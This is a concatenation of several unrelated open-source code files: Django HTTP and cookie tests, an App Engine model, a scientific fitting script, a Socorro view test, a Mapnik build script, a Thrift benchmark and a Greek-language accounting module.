self.assertEqual(q.urlencode(), 'foo=bar')
def test_urlencode(self):
q = QueryDict('', mutable=True)
q['next'] = '/a&b/'
self.assertEqual(q.urlencode(), 'next=%2Fa%26b%2F')
self.assertEqual(q.urlencode(safe='/'), 'next=/a%26b/')
q = QueryDict('', mutable=True)
q['next'] = u'/t\xebst&key/'
self.assertEqual(q.urlencode(), 'next=%2Ft%C3%ABst%26key%2F')
self.assertEqual(q.urlencode(safe='/'), 'next=/t%C3%ABst%26key/')
def test_mutable_copy(self):
"""A copy of a QueryDict is mutable."""
q = QueryDict('').copy()
self.assertRaises(KeyError, q.__getitem__, "foo")
q['name'] = 'john'
self.assertEqual(q['name'], 'john')
def test_mutable_delete(self):
q = QueryDict('').copy()
q['name'] = 'john'
del q['name']
self.assertFalse('name' in q)
def test_basic_mutable_operations(self):
q = QueryDict('').copy()
q['name'] = 'john'
self.assertEqual(q.get('foo', 'default'), 'default')
self.assertEqual(q.get('name', 'default'), 'john')
self.assertEqual(q.getlist('name'), ['john'])
self.assertEqual(q.getlist('foo'), [])
q.setlist('foo', ['bar', 'baz'])
self.assertEqual(q.get('foo', 'default'), 'baz')
self.assertEqual(q.getlist('foo'), ['bar', 'baz'])
q.appendlist('foo', 'another')
self.assertEqual(q.getlist('foo'), ['bar', 'baz', 'another'])
self.assertEqual(q['foo'], 'another')
self.assertTrue(q.has_key('foo'))
self.assertTrue('foo' in q)
self.assertEqual(q.items(), [(u'foo', u'another'), (u'name', u'john')])
self.assertEqual(q.lists(), [(u'foo', [u'bar', u'baz', u'another']), (u'name', [u'john'])])
self.assertEqual(q.keys(), [u'foo', u'name'])
self.assertEqual(q.values(), [u'another', u'john'])
self.assertEqual(len(q), 2)
q.update({'foo': 'hello'})
self.assertEqual(q['foo'], 'hello')
self.assertEqual(q.get('foo', 'not available'), 'hello')
self.assertEqual(q.getlist('foo'), [u'bar', u'baz', u'another', u'hello'])
self.assertEqual(q.pop('foo'), [u'bar', u'baz', u'another', u'hello'])
self.assertEqual(q.pop('foo', 'not there'), 'not there')
self.assertEqual(q.get('foo', 'not there'), 'not there')
self.assertEqual(q.setdefault('foo', 'bar'), 'bar')
self.assertEqual(q['foo'], 'bar')
self.assertEqual(q.getlist('foo'), ['bar'])
self.assertEqual(q.urlencode(), 'foo=bar&name=john')
q.clear()
self.assertEqual(len(q), 0)
def test_multiple_keys(self):
"""Test QueryDict with two key/value pairs with same keys."""
q = QueryDict('vote=yes&vote=no')
self.assertEqual(q['vote'], u'no')
self.assertRaises(AttributeError, q.__setitem__, 'something', 'bar')
self.assertEqual(q.get('vote', 'default'), u'no')
self.assertEqual(q.get('foo', 'default'), 'default')
self.assertEqual(q.getlist('vote'), [u'yes', u'no'])
self.assertEqual(q.getlist('foo'), [])
self.assertRaises(AttributeError, q.setlist, 'foo', ['bar', 'baz'])
self.assertRaises(AttributeError, q.setlist, 'foo', ['bar', 'baz'])
self.assertRaises(AttributeError, q.appendlist, 'foo', ['bar'])
self.assertEqual(q.has_key('vote'), True)
self.assertEqual('vote' in q, True)
self.assertEqual(q.has_key('foo'), False)
self.assertEqual('foo' in q, False)
self.assertEqual(q.items(), [(u'vote', u'no')])
self.assertEqual(q.lists(), [(u'vote', [u'yes', u'no'])])
self.assertEqual(q.keys(), [u'vote'])
self.assertEqual(q.values(), [u'no'])
self.assertEqual(len(q), 1)
self.assertRaises(AttributeError, q.update, {'foo': 'bar'})
self.assertRaises(AttributeError, q.pop, 'foo')
self.assertRaises(AttributeError, q.popitem)
self.assertRaises(AttributeError, q.clear)
self.assertRaises(AttributeError, q.setdefault, 'foo', 'bar')
self.assertRaises(AttributeError, q.__delitem__, 'vote')
def test_invalid_input_encoding(self):
"""
QueryDicts must be able to handle invalid input encoding (in this
case, bad UTF-8 encoding).
"""
q = QueryDict('foo=bar&foo=\xff')
self.assertEqual(q['foo'], u'\ufffd')
self.assertEqual(q.getlist('foo'), [u'bar', u'\ufffd'])
def test_pickle(self):
q = QueryDict('')
q1 = pickle.loads(pickle.dumps(q, 2))
self.assertEqual(q == q1, True)
q = QueryDict('a=b&c=d')
q1 = pickle.loads(pickle.dumps(q, 2))
self.assertEqual(q == q1, True)
q = QueryDict('a=b&c=d&a=1')
q1 = pickle.loads(pickle.dumps(q, 2))
self.assertEqual(q == q1 , True)
def test_update_from_querydict(self):
"""Regression test for #8278: QueryDict.update(QueryDict)"""
x = QueryDict("a=1&a=2", mutable=True)
y = QueryDict("a=3&a=4")
x.update(y)
self.assertEqual(x.getlist('a'), [u'1', u'2', u'3', u'4'])
def test_non_default_encoding(self):
"""#13572 - QueryDict with a non-default encoding"""
q = QueryDict('sbb=one', encoding='rot_13')
self.assertEqual(q.encoding , 'rot_13' )
self.assertEqual(q.items() , [(u'foo', u'bar')] )
self.assertEqual(q.urlencode() , 'sbb=one' )
q = q.copy()
self.assertEqual(q.encoding , 'rot_13' )
self.assertEqual(q.items() , [(u'foo', u'bar')] )
self.assertEqual(q.urlencode() , 'sbb=one' )
self.assertEqual(copy.copy(q).encoding , 'rot_13' )
self.assertEqual(copy.deepcopy(q).encoding , 'rot_13')
class HttpResponseTests(unittest.TestCase):
def test_unicode_headers(self):
r = HttpResponse()
# If we insert a unicode value it will be converted to an ascii
r['value'] = u'test value'
self.assertTrue(isinstance(r['value'], str))
        # An error is raised when a unicode object with non-ascii is assigned.
self.assertRaises(UnicodeEncodeError, r.__setitem__, 'value', u't\xebst value')
# An error is raised when a unicode object with non-ASCII format is
# passed as initial mimetype or content_type.
self.assertRaises(UnicodeEncodeError, HttpResponse,
mimetype=u't\xebst value')
# HttpResponse headers must be convertible to ASCII.
self.assertRaises(UnicodeEncodeError, HttpResponse,
content_type=u't\xebst value')
        # The response also converts unicode keys to strings.
r[u'test'] = 'testing key'
l = list(r.items())
l.sort()
self.assertEqual(l[1], ('test', 'testing key'))
# It will also raise errors for keys with non-ascii data.
self.assertRaises(UnicodeEncodeError, r.__setitem__, u't\xebst key', 'value')
def test_newlines_in_headers(self):
# Bug #10188: Do not allow newlines in headers (CR or LF)
r = HttpResponse()
self.assertRaises(BadHeaderError, r.__setitem__, 'test\rstr', 'test')
self.assertRaises(BadHeaderError, r.__setitem__, 'test\nstr', 'test')
def test_dict_behavior(self):
"""
Test for bug #14020: Make HttpResponse.get work like dict.get
"""
r = HttpResponse()
self.assertEqual(r.get('test'), None)
class CookieTests(unittest.TestCase):
def test_encode(self):
"""
Test that we don't output tricky characters in encoded value
"""
c = SimpleCookie()
c['test'] = "An,awkward;value"
self.assertTrue(";" not in c.output().rstrip(';')) # IE compat
self.assertTrue("," not in c.output().rstrip(';')) # Safari compat
def test_decode(self):
"""
Test that we can still preserve semi-colons and commas
"""
c = SimpleCookie()
c['test'] = "An,awkward;value"
c2 = SimpleCookie()
c2.load(c.output())
self.assertEqual(c['test'].value, c2['test'].value)
def test_decode_2(self):
"""
Test that we haven't broken normal encoding
"""
c = SimpleCookie()
c['test'] = "\xf0"
c2 = SimpleCookie()
c2.load(c.output())
self.assertEqual(c['test'].value, c2['test'].value)
def test_nonstandard_keys(self):
"""
Test that a single non-standard cookie name doesn't affect all cookies. Ticket #13007.
"""
self.assertTrue('good_cookie' in parse_cookie('good_cookie=yes;bad:cookie=yes').keys())
def test_repeated_nonstandard_keys(self):
"""
Test that a repeated non-standard name doesn't affect all cookies. Ticket #15852
"""
self.assertTrue('good_cookie' in parse_cookie('a,=b; a,=c; good_cookie=yes').keys())
def test_httponly_after_load(self):
"""
Test that we can use httponly attribute on cookies that we load
"""
c = SimpleCookie()
c.load("name=val")
c['name']['httponly'] = True
self.assertTrue(c['name']['httponly'])
| bsd-3-clause | 7,767,958,254,567,024,000 | 38.666667 | 99 | 0.585157 | false |
nardorb/OneStop | models/taxi_driver.py | 1 | 1177 | from google.appengine.ext import db
class TaxiDriver(db.Model):
EXCEPTION_NO_PARENT = "`parent` property must be an `Account` object."
name = db.StringProperty(default=None)
email = db.EmailProperty(default=None)
sex = db.StringProperty(default=None)
address = db.StringProperty(default=None)
parish = db.StringProperty(default=None)
tel_number = db.StringProperty(default=None)
# years_with_license = db.StringProperty(default=None)
# road_accidents = db.IntegerProperty(default=None)
driver_id = db.StringProperty(default=None)
is_on_duty = db.BooleanProperty(default=False)
location = db.StringProperty(default=None)
dob = db.StringProperty(default=None)
@classmethod
def get_by_driver_id(cls, driver_id):
return cls.all().filter('driver_id =', driver_id).get()
def get_by_location(self, location):
return None
def put(self, *args, **kwargs):
# This is not at the top to prevent circular imports.
from models.account import Account
parent = self.parent()
if not parent or not isinstance(parent, Account):
raise ValueError(self.EXCEPTION_NO_PARENT)
return super(TaxiDriver, self).put(*args, **kwargs) | gpl-2.0 | 1,523,704,451,616,366,000 | 33.647059 | 72 | 0.724724 | false |
mattbrowley/PSim | Covariances.py | 1 | 7985 | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
import PSim
import pickle
import csv
import simplex
fit_type = 'global'
scale = 0.003
with open("pickled_data.p", "r") as file:
pickled_data = pickle.load(file)
powers = pickled_data['powers']
xdata = pickled_data['allxdata']
ydata = pickled_data['allydata']
xarray = pickled_data['xarray']
yarrays = pickled_data['yarrays']
averages = pickled_data['averages']
period = 50 # ns
with open("pickled_data_250.p", "r") as file:
pickled_data_250 = pickle.load(file)
powers_250 = pickled_data_250['powers']
xdata_250 = pickled_data_250['allxdata']
ydata_250 = pickled_data_250['allydata']
xarray_250 = pickled_data_250['xarray']
yarrays_250 = pickled_data_250['yarrays']
averages_250 = pickled_data_250['averages']
period_250 = 1.0 / 250000.0 / 1e-9 # ns
def scalar_min(p, data):
xdata, ydata, ysim = data[0]
xdata_250, ydata_250, ysim_250 = data[1]
scaled_ysim = ysim * p[0]
scaled_ysim_250 = ysim_250 * p[0]
err_20 = 0
err_250 = 0
num_points = 0
for dat, sim in zip(ydata, scaled_ysim):
for x, d, s in zip(xdata, dat, sim):
try:
if s > 0:
log_s = np.log(s)
else:
log_s = 0
log_d = np.log(d)
error = (log_s - log_d)
# error = np.log(error)
err_20 += error*error
num_points = num_points + 1
except:
err_20 += 8e20
err_20 = err_20 / num_points
num_points = 0
for dat, sim in zip(ydata_250[:-1], scaled_ysim_250[:-1]):
for x, d, s in zip(xdata_250, dat, sim):
try:
if s > 0:
log_s = np.log(s)
else:
log_s = 0
log_d = np.log(d)
error = (log_s - log_d)
# error = np.log(error)
if x >= -0.25 and x <= 120:
err_250 += error*error
num_points = num_points + 1
except:
err_250 += 8e20
err_250 = err_250 / num_points
err = np.sqrt(err_250*err_20)
if np.isnan(err):
err = 7e20
fitness = err * 100
return fitness
def evaluate(p):
dummy_x = np.zeros(10)
dummy_y = np.zeros([10, 10])
data = [[dummy_x, dummy_y, dummy_y], [dummy_x, dummy_y, dummy_y]]
if fit_type is 'global' or fit_type is 20: # 20 MHz data
sim = PSim.DecaySim(reprate=20000000, tolerance=0.005, step=5e-12)
sim.trap = p[0]
sim.EHdecay = p[1] * sim.step
sim.Etrap = p[2] * sim.step
sim.FHloss = p[3] * sim.step
sim.Gdecay = p[4] * sim.step
sim.G2decay = p[5] * sim.step
sim.G3decay = p[6] * sim.step
sim.GHdecay = p[7] * sim.step
sim.Gescape = p[8] * sim.step
sim.Gform = p[9] * sim.step * 0
sim.G3loss = p[9] * sim.step
sim.scalar = 1
for power in powers:
sim.addPower(power)
sim.runSim()
interp_signals = []
for this_run in sim.signal:
interp_this = np.interp(xarray, sim.xdata, this_run)
interp_signals.append(interp_this)
interp_signals = np.array(interp_signals)
data[0] = [xarray, yarrays, interp_signals]
if fit_type is 'global' or fit_type is 250: # 250 kHz data
sim_250 = PSim.DecaySim(reprate=250000, tolerance=0.005, step=5e-12)
sim_250.trap = p[0]
sim_250.EHdecay = p[1] * sim_250.step
sim_250.Etrap = p[2] * sim_250.step
sim_250.FHloss = p[3] * sim_250.step
sim_250.Gdecay = p[4] * sim_250.step
sim_250.G2decay = p[5] * sim_250.step
sim_250.G3decay = p[6] * sim_250.step
sim_250.GHdecay = p[7] * sim_250.step
sim_250.Gescape = p[8] * sim_250.step
sim_250.Gform = p[9] * sim_250.step * 0
sim_250.G3loss = p[9] * sim_250.step
sim_250.scalar = 1
for power in powers_250:
sim_250.addPower(power)
sim_250.runSim()
interp_signals_250 = []
for this_run in sim_250.signal:
interp_this = np.interp(xarray_250, sim_250.xdata, this_run)
interp_signals_250.append(interp_this)
interp_signals_250 = np.array(interp_signals_250)
data[1] = [xarray_250, yarrays_250, interp_signals_250]
# Use a simplex minimization to find the best scalar
scalar0 = np.array([3e-26])
ranges = scalar0*0.1
s = simplex.Simplex(scalar_min, scalar0, ranges)
values, fitness, iter = s.minimize(epsilon=0.00001, maxiters=500,
monitor=0, data=data)
scalar = values[0]
#p[-1] = scalar
if scalar < 0:
fitness = 1e30
return fitness
def main():
logname = 'best_{}.log'.format(fit_type)
with open(logname, 'rb') as best_file:
reader = csv.reader(best_file, dialect='excel-tab')
p0 = []
for val in reader.next():
p0.append(np.float(val))
dim = 11
pi = np.ones(dim)
for i, n in enumerate([0,1,2,3,4,5,6,7,8,9,10]):
pi[i] = p0[n]
ps1 = np.ndarray([dim, dim, dim])
ps2 = np.ndarray([dim, dim, dim])
fitness1 = np.ndarray([dim, dim])
fitness2 = np.ndarray([dim, dim])
differences = scale*pi
for i in range(dim):
for j in range(dim):
for k in range(dim):
val1 = pi[k]
val2 = pi[k]
if i == k or j == k:
val1 = val1 + differences[k]
val2 = val2 - differences[k]
ps1[i][j][k] = val1
ps2[i][j][k] = val2
for i in range(dim):
for j in range(i, dim):
fitness1[i][j] = evaluate(ps1[i][j])
fitness1[j][i] = fitness1[i][j]
fitness2[i][j] = evaluate(ps2[i][j])
fitness2[j][i] = fitness2[i][j]
error0 = evaluate(pi)
data = {'fitness1': fitness1,
'fitness2': fitness2,
'differences': differences,
'error0': error0}
with open("covariance_data_{}.p".format(scale), "wb") as file:
pickle.dump(data, file)
hessian = np.ndarray([dim, dim])
for i in range(dim):
for j in range(dim):
if i == j:
d2i = differences[i]
df1 = (fitness1[i][j] - error0) / d2i
df2 = (error0 - fitness2[i][j]) / d2i
hessian[i][j] = (df1 - df2) / (d2i)
else:
df1di1 = (fitness1[i][i] - error0) / differences[i]
df1di2 = (fitness1[i][j] - fitness1[j][j]) / differences[i]
dff1didj = (df1di2 - df1di1) / differences[j]
df2di1 = (error0 - fitness2[i][i]) / differences[i]
df2di2 = (fitness2[j][j] - fitness2[i][j]) / differences[i]
dff2didj = (df2di2 - df2di1) / differences[j]
hessian[i][j] = (dff1didj + dff2didj) / 2
hessian[j][i] = hessian[i][j]
with open("hessian_{}.p".format(scale), "wb") as file:
pickle.dump(hessian, file)
m_hessian = np.matrix(hessian)
covariance = np.linalg.inv(m_hessian)
cv_array = np.array(covariance)
paramaters=['Traps', 'EH_Decay', 'E_Trap', 'TH_loss', 'G_Decay', 'G2_Decay', 'G3_Decay', 'GH_Decay', 'G_Escape', 'G3_Loss']
    for i in range(len(paramaters)):  # only the labelled parameters (10 names, dim is 11)
print('{}{}: {} +- {}'.format(' ' * (8-len(paramaters[i])), paramaters[i], p0[i], np.sqrt(cv_array[i][i])))
with open('Parameters_{}.txt'.format(scale), 'w') as f:
writer = csv.writer(f, dialect="excel-tab")
for i in range(10):
error = np.sqrt(cv_array[i][i])
relerror = error / pi[i] * 100
words = '{}{}: {} +- {} ({}%)'.format(' ' * (8-len(paramaters[i])), paramaters[i], pi[i], error, relerror)
print(words)
writer.writerow([words])
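# Illustrative sketch (not part of the original analysis): the same
# central-difference recipe used in main(), applied to a toy two-parameter
# quadratic with known curvature so the Hessian -> covariance step is easy to
# verify. Everything below is local to the sketch.
def toy_hessian_sketch():
    def fitness(p):
        return 3.0 * p[0] ** 2 + 0.5 * p[1] ** 2  # exact Hessian is diag(6, 1)
    p0 = np.array([1.0, 2.0])
    h = scale * p0  # same relative step size as used for the real parameters
    dim = len(p0)
    hessian = np.zeros([dim, dim])
    for i in range(dim):
        for j in range(dim):
            pp = p0.copy()
            pp[i] += h[i]
            pp[j] += h[j]
            pm = p0.copy()
            pm[i] += h[i]
            pm[j] -= h[j]
            mp = p0.copy()
            mp[i] -= h[i]
            mp[j] += h[j]
            mm = p0.copy()
            mm[i] -= h[i]
            mm[j] -= h[j]
            hessian[i][j] = (fitness(pp) - fitness(pm) - fitness(mp) +
                             fitness(mm)) / (4 * h[i] * h[j])
    covariance = np.linalg.inv(hessian)
    return np.sqrt(np.diag(covariance))  # 1-sigma errors, as printed by main()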
if __name__ == '__main__':
main()
| mit | 8,866,360,628,721,313,000 | 35.295455 | 127 | 0.520726 | false |
mozilla/socorro | webapp-django/crashstats/exploitability/tests/test_views.py | 1 | 5320 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import pyquery
from django.conf import settings
from django.urls import reverse
from crashstats.crashstats import models
from crashstats.crashstats.tests.test_views import BaseTestViews
from crashstats.supersearch.models import SuperSearchUnredacted
class TestViews(BaseTestViews):
def test_exploitability_report(self):
models.BugAssociation.objects.create(
bug_id=111111111, signature="FakeSignature 1"
)
models.BugAssociation.objects.create(
bug_id=222222222, signature="FakeSignature 3"
)
models.BugAssociation.objects.create(
bug_id=101010101, signature="FakeSignature"
)
url = reverse("exploitability:report")
queried_versions = []
def mocked_supersearch_get(**params):
assert params["product"] == ["WaterWolf"]
queried_versions.append(params.get("version"))
assert params["_aggs.signature"] == ["exploitability"]
assert params["_facets_size"] == settings.EXPLOITABILITY_BATCH_SIZE
assert params["exploitability"]
assert params["_fields"]
facets = [
{
"count": 229,
"facets": {
"exploitability": [
{"count": 210, "term": "none"},
{"count": 19, "term": "low"},
]
},
"term": "FakeSignature 1",
},
{
"count": 124,
"facets": {
"exploitability": [
{"count": 120, "term": "none"},
{"count": 1, "term": "high"},
{"count": 4, "term": "interesting"},
]
},
"term": "FakeSignature 3",
},
{
"count": 104,
"facets": {
"exploitability": [
{"count": 93, "term": "low"},
{"count": 11, "term": "medium"},
]
},
"term": "Other Signature",
},
{
"count": 222,
"facets": {
"exploitability": [
# one that doesn't add up to 4
{"count": 10, "term": "null"},
{"count": 20, "term": "none"},
]
},
"term": "FakeSignature",
},
]
return {"facets": {"signature": facets}, "hits": [], "total": 1234}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
response = self.client.get(url, {"product": "WaterWolf"})
assert response.status_code == 302
user = self._login()
response = self.client.get(url, {"product": "WaterWolf"})
assert response.status_code == 302
group = self._create_group_with_permission("view_exploitability")
user.groups.add(group)
assert user.has_perm("crashstats.view_exploitability")
# unrecognized product
response = self.client.get(url, {"product": "XXXX"})
assert response.status_code == 404
# unrecognized version
response = self.client.get(url, {"product": "WaterWolf", "version": "0000"})
assert response.status_code == 400
# valid version but not for WaterWolf
response = self.client.get(url, {"product": "WaterWolf", "version": "1.5"})
assert response.status_code == 400
# if you omit the product, it'll redirect and set the default product
response = self.client.get(url)
assert response.status_code == 302
assert response["Location"].endswith(
url + "?product=%s" % settings.DEFAULT_PRODUCT
)
response = self.client.get(url, {"product": "WaterWolf", "version": "19.0"})
assert response.status_code == 200
doc = pyquery.PyQuery(response.content)
# We expect a table with 3 different signatures
# The signature with the highest high+medium count is
# 'Other Signature' etc.
tds = doc("table.data-table tbody td:first-child a")
texts = [x.text for x in tds]
assert texts == ["Other Signature", "FakeSignature 3", "FakeSignature 1"]
# The first signature doesn't have any bug associations,
# but the second and the third does.
rows = doc("table.data-table tbody tr")
texts = [[x.text for x in doc("td.bug_ids_more a", row)] for row in rows]
expected = [[], ["222222222"], ["111111111"]]
assert texts == expected
assert queried_versions == [["19.0"]]
response = self.client.get(url, {"product": "WaterWolf"})
assert response.status_code == 200
assert queried_versions == [["19.0"], None]
| mpl-2.0 | -6,342,788,906,215,783,000 | 37.550725 | 87 | 0.509023 | false |
mapycz/mapnik | utils/mapnik-index/build.py | 1 | 2028 | #
# This file is part of Mapnik (c++ mapping toolkit)
#
# Copyright (C) 2015 Artem Pavlenko
#
# Mapnik is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
#
import os
import glob
from copy import copy
Import ('env')
Import ('plugin_base')
program_env = plugin_base.Clone()
source = Split(
"""
mapnik-index.cpp
process_csv_file.cpp
process_geojson_file.cpp
../../plugins/input/csv/csv_utils.cpp
"""
)
headers = env['CPPPATH']
libraries = [env['MAPNIK_NAME']]
# need on linux: https://github.com/mapnik/mapnik/issues/3145
libraries.append('mapnik-json')
libraries.append('mapnik-wkt')
libraries.append(env['ICU_LIB_NAME'])
libraries.append(env['BOOST_LIB_PATHS']['system'])
libraries.append(env['BOOST_LIB_PATHS']['program_options'])
if env['RUNTIME_LINK'] == 'static':
libraries.extend(copy(env['LIBMAPNIK_LIBS']))
if env['PLATFORM'] == 'Linux':
libraries.append('dl')
mapnik_index = program_env.Program('mapnik-index', source, CPPPATH=headers, LIBS=libraries)
Depends(mapnik_index, env.subst('../../src/%s' % env['MAPNIK_LIB_NAME']))
if 'uninstall' not in COMMAND_LINE_TARGETS:
env.Install(os.path.join(env['INSTALL_PREFIX'],'bin'), mapnik_index)
env.Alias('install', os.path.join(env['INSTALL_PREFIX'],'bin'))
env['create_uninstall_target'](env, os.path.join(env['INSTALL_PREFIX'],'bin','mapnik-index'))
| lgpl-2.1 | 6,641,049,399,856,726,000 | 31.190476 | 93 | 0.711045 | false |
ashishb/benchmarking | serialization/exec_thrift.py | 1 | 1364 | import os
import random
import sys
sys.path.append(os.path.join(os.getcwd(), 'gen-py'))
from thrift.protocol import TBinaryProtocol
from thrift.transport import TTransport
# Generated using
# thrift -o . --gen py:new_style student.thrift
from student.ttypes import Course
from student.ttypes import Student
# Based on http://wiki.apache.org/thrift/ThriftUsagePython
def getNewStudent(i, num_courses):
new_student = Student()
new_student.id = random.randint(0, i)
new_student.first_name = str(random.randint(0, i))
new_student.last_name = str(random.randint(0, i))
new_student.comments = str(random.randint(0, i))
new_student.courses = list()
for j in xrange(0, num_courses):
new_course = Course()
new_course.name = str(random.randint(0, i)) + str(random.randint(0, j))
new_course.marks = 100 * random.randint(0, j) / num_courses
new_student.courses.append(new_course)
return new_student
def serialize(student):
student.validate()
transport_out = TTransport.TMemoryBuffer()
protocol_out = TBinaryProtocol.TBinaryProtocol(transport_out)
student.write(protocol_out)
bytes = transport_out.getvalue()
return bytes
def deserialize(serialized_student):
transport_in = TTransport.TMemoryBuffer(serialized_student)
protocol_in = TBinaryProtocol.TBinaryProtocol(transport_in)
student = Student()
student.read(protocol_in)
return student
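# Minimal roundtrip sketch using only the helpers above (not part of the
# original benchmark): generated Thrift structs compare by field values, so a
# serialize/deserialize cycle should give back an equal Student.
def roundtrip_example():
    student = getNewStudent(1000, 5)
    data = serialize(student)
    restored = deserialize(data)
    assert restored == student
    return len(data)  # size of the Thrift binary encoding in bytes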
| apache-2.0 | -2,492,919,796,256,315,400 | 29.311111 | 73 | 0.756598 | false |
tedlaz/pyted | pylogistiki/book.py | 1 | 17624 | '''Basic module for accounting'''
import utils as ul
import parse_singularo_afm as pafm
FORMAT_LINE = '%-15s %12s %12s'
SPLIT_CHAR = '.'
LM1 = ul.read_txt_to_dict('log_sxedio.txt')
def parse_afm_5398(file='afm-5398.txt'):
afmdic = {}
pfpadic = {}
with open(file) as fle:
for line in fle:
lmos, afm, pfpa, _ = line.split('|')
afmdic[lmos] = afm
pfpadic[lmos] = ul.dec(ul.dec(pfpa) / ul.dec(100))
return afmdic, pfpadic
def date2period(isodate):
year, month, _ = isodate.split('-')
imonth = int(month)
if imonth <= 3:
return '%s-%s-%s' % (year, '03', '31')
elif imonth <= 6:
return '%s-%s-%s' % (year, '06', '30')
elif imonth <= 9:
return '%s-%s-%s' % (year, '09', '30')
elif imonth <= 12:
return '%s-%s-%s' % (year, '12', '31')
else:
return '%s-%s-%s' % (year, '12', '31')
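# Small illustrative check (not part of the original module): date2period()
# maps any date to the last day of its calendar quarter.
def _date2period_example():
    assert date2period('2016-05-17') == '2016-06-30'
    assert date2period('2016-11-02') == '2016-12-31'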
class Line():
def __init__(self, lmo, xre, pis):
assert xre + pis != 0
self.lmo = lmo
self.xre = ul.dec(xre)
self.pis = ul.dec(pis)
def lmop(self, lmodic):
return lmodic.get(self.lmo, self.lmo)
@property
def typos(self):
typ = set()
if self.lmo.startswith('1'):
typ.add('ΠΑΓΙΑ')
typ.add('ΕΕ')
typ.add('1')
if self.lmo.startswith('2'):
typ.add('ΑΠΟΘΕΜΑΤΑ')
typ.add('ΕΕ')
typ.add('ΕΕ ΕΞΟΔΑ')
typ.add('2')
if self.lmo.startswith('20'):
typ.add('ΕΜΠΟΡΕΥΜΑΤΑ')
if self.lmo.startswith('20.00'):
typ.add('ΑΠΟΓΡΑΦΗ ΕΜΠΟΡΕΥΜΑΤΩΝ')
if self.lmo.startswith('20.01'):
typ.add('ΑΓΟΡΕΣ ΕΜΠΟΡΕΥΜΑΤΩΝ')
typ.add('ΑΓΟΡΕΣ')
if self.lmo.startswith('24.01'):
typ.add("ΑΓΟΡΕΣ Α' ΚΑΙ Β' ΥΛΩΝ")
typ.add('ΑΓΟΡΕΣ')
if self.lmo.startswith('3'):
typ.add('ΑΠΑΙΤΗΣΕΙΣ')
typ.add('3-5')
if self.lmo.startswith('38'):
typ.add('ΜΕΤΡΗΤΑ')
if self.lmo.startswith('4'):
typ.add('ΚΕΦΑΛΑΙΟ')
if self.lmo.startswith('5'):
typ.add('ΥΠΟΧΡΕΩΣΕΙΣ')
typ.add('3-5')
if self.lmo.startswith('50'):
typ.add('ΠΡΟΜΗΘΕΥΤΕΣ')
if self.lmo.startswith('54.00'):
typ.add('ΦΠΑ')
typ.add('54.00')
if self.lmo.startswith('6'):
typ.add('ΕΞΟΔΑ')
typ.add('ΕΕ')
typ.add('ΕΕ ΕΞΟΔΑ')
typ.add('6')
if self.lmo.startswith('7'):
typ.add('ΕΣΟΔΑ')
typ.add('ΠΩΛΗΣΕΙΣ')
typ.add('ΕΕ')
typ.add('ΕΕ ΕΣΟΔΑ')
typ.add('7')
if self.lmo.startswith('70'):
typ.add('ΠΩΛΗΣΕΙΣ ΕΜΠΟΡΕΥΜΑΤΩΝ')
if self.lmo.startswith('71'):
typ.add('ΠΩΛΗΣΕΙΣ ΠΡΟΪΟΝΤΩΝ')
if self.lmo.startswith('8'):
typ.add('ΑΝΟΡΓΑΝΑ')
return typ
def is_typos(self, typos):
return typos in self.typos
def has_tag(self, tag):
return tag in self.typos
@property
def is_xreostiko(self):
return self.y > 0
@property
def y(self):
return self.xre - self.pis
@property
def gy(self):
return ul.dec2gr(self.y)
@property
def gxre(self):
return ul.dec2gr(self.xre)
@property
def gpis(self):
return ul.dec2gr(self.pis)
@property
def hierarchy(self):
assert len(self.lmo) > 1
listlmo = self.lmo.split(SPLIT_CHAR)
listfinal = ['t']
if self.lmo[0] in '267':
listfinal.append('t267')
elif self.lmo[0] in '35':
listfinal.append('t35')
listfinal.append(self.lmo[0])
tmp = ''
for el in listlmo:
if tmp == '':
tmp = el
else:
tmp = SPLIT_CHAR.join([tmp, el])
listfinal.append(tmp)
return listfinal
def __str__(self):
return FORMAT_LINE % (self.lmo, self.gxre, self.gpis)
class Arthro():
def __init__(self, dat, par, per, lines=None):
self.dat = dat
self.par = par
self.per = per
if lines:
self.z = lines
else:
self.z = []
def similarities(self):
'''Find similarities between accounts'''
print(', '.join([lm.lmo for lm in self.z]))
@property
def typos(self):
tset = set()
for line in self.z:
tset = tset.union(line.typos)
# if {'ΦΠΑ', 'ΑΓΟΡΕΣ'}.issubset(tset):
# tset.add('ΑΓΟΡΕΣ ΜΕ ΦΠΑ')
# if {'ΑΓΟΡΕΣ', 'ΠΡΟΜΗΘΕΥΤΕΣ'}.issubset(tset):
# tset.add('ΑΓΟΡΕΣ ΕΠΙ ΠΙΣΤΩΣΕΙ')
return tset
@property
def ee_typos(self):
if 'ΕΕ ΕΣΟΔΑ' in self.typos:
return '7'
elif 'ΕΕ ΕΞΟΔΑ' in self.typos:
return '26'
elif '1' in self.typos:
return '1'
else:
return 'ΛΑΘΟΣ'
@property
def ee_synt(self):
if 'ΕΕ ΕΣΟΔΑ' in self.typos:
return ul.dec(-1)
elif 'ΕΕ ΕΞΟΔΑ' in self.typos:
return ul.dec(1)
elif '1' in self.typos:
return ul.dec(1)
else:
return ul.dec(0)
def is_typos(self, typos):
return typos in self.typos
@property
def lmoi(self):
'''List with arthro lmoi'''
return [line.lmo for line in self.z]
@property
def zlines(self):
'''Number of lines'''
return len(self.z)
def add(self, line):
self.z.append(line)
@property
def val(self):
return sum([line.xre for line in self.z])
@property
def is_complete(self):
total = sum([line.y for line in self.z])
abstotal = sum([abs(line.y) for line in self.z])
return total == 0 and abstotal > 0
def __str__(self):
ast = '%s %s %s\n' % (self.dat, self.par, self.per)
txr = tpi = ul.dec(0)
for line in self.z:
ast += ' %s\n' % line
txr += line.xre
tpi += line.pis
ast += ' ' + FORMAT_LINE % ('Σύνολο', txr, tpi)
return ast
class Book():
def __init__(self, lmoi=None, arthra=None):
# self.lmoi = lmoi
self.lmoi = {**lmoi, **LM1}
self.arthra = arthra
def add_arthro(self, arthro):
self.arthra.append(arthro)
